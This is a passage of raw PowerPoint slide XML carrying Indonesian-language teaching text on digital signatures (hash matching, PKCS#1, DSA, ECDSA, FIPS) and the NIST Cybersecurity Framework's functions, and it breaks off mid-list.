            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatanganinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> digital. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Publik #1 (PKCS#1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> RSA. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Tanda Tangan Digital (DSA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> cipher yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> ElGamal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Elliptic Curve DSA (ECDSA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. DSA dan ECDSA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Federal (FIPS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> AS</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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2150774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Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diklasifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lima </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh National Institute of Standards and Technology (NIST) (nist.gov/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cyberframework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/online-learning/five-functions):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengidentifikasi-mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekomendasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melindungi-memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melekat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mendeteksi-melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menanggapi-mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membasmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
